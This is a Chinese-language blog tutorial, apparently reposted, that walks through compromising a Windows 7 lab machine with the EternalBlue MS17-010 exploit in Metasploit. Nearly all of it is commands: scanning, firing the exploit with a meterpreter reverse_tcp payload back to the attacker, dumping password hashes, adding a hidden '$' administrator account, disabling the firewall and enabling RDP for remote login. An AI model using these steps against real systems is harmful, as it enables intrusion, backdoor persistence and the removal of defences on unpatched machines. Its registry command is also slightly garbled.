永恒之蓝ms17-010 入侵windows系统

准备:

kali为攻击机,ip:172.17.2.132

win7为靶机, ip:172.17.2.64

使用msf模块。需要在同一局域网中。

步骤:

1.启动数据库服务

service postgresql start

 2.开启msf

3.搜索永恒之蓝

 4.使用永恒之蓝ms17-010漏洞

use auxiliary/scanner/smb/smb_ms17_010

 5.查看选项

show options

 6.查看靶机ip地址

 172.17.2.64

7.设置rhosts为靶机地址

 8.运行run

 9.扫描具体的ms17_010(永恒之蓝漏洞)

search name:ms17 type:exploit

 10.选择第0个。

use exploit/windows/smb/ms17_010_eternalblue

10(1)如果目标为win2003,则选择

use exploit/windows/smb/ms17_010_psexec

11.查看需要配置的选项。

 12.设置rhosts为靶机ip。

 13..显示攻击载荷。

 14.选择设置windows/x64/meterpreter/reverse_tcp的攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

 15.再次查看配置。

 16.检查无误后运行

 17.运行成功,连接上。help或者?可以打开帮助。

 

 18.getuid,获取靶机账户

 19.查看靶机的用户名及密码,可以看到cover为账户,:后的md5为密码。

如果md5破解不出,可以添加账户。

19. shell.

 20.看到出现乱码了,chcp 65001 可以解决。

 

21.net user,查看用户

 22.添加qwer用户 密码为123456789

 

22(1)

添加隐藏账户

net user test$ 123456 /add

提权至管理员账户

 net localgroup administrators test$ /add

注:

用户名要以$结尾

添加后,该帐户可在一定条件下隐藏,输入net user无法获取

 23.将qwer提至管理员权限。

关闭防火墙
命令:netsh firewall set opmode mode=disable

查看防火墙状态:netsh firewall show state

24.安装远程桌面软件

apt-get install rdesktop

24.REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f          打开3389远程连接端口

25.在命令符中输入

rdesktop 172.17.2.64  进入远程连接。

 隐藏账户要加入$

 连接成功。

本人小白,不接受任何合作,文章多为转载,如有侵权请联系。
原文地址:https://www.cnblogs.com/thespace/p/14680055.html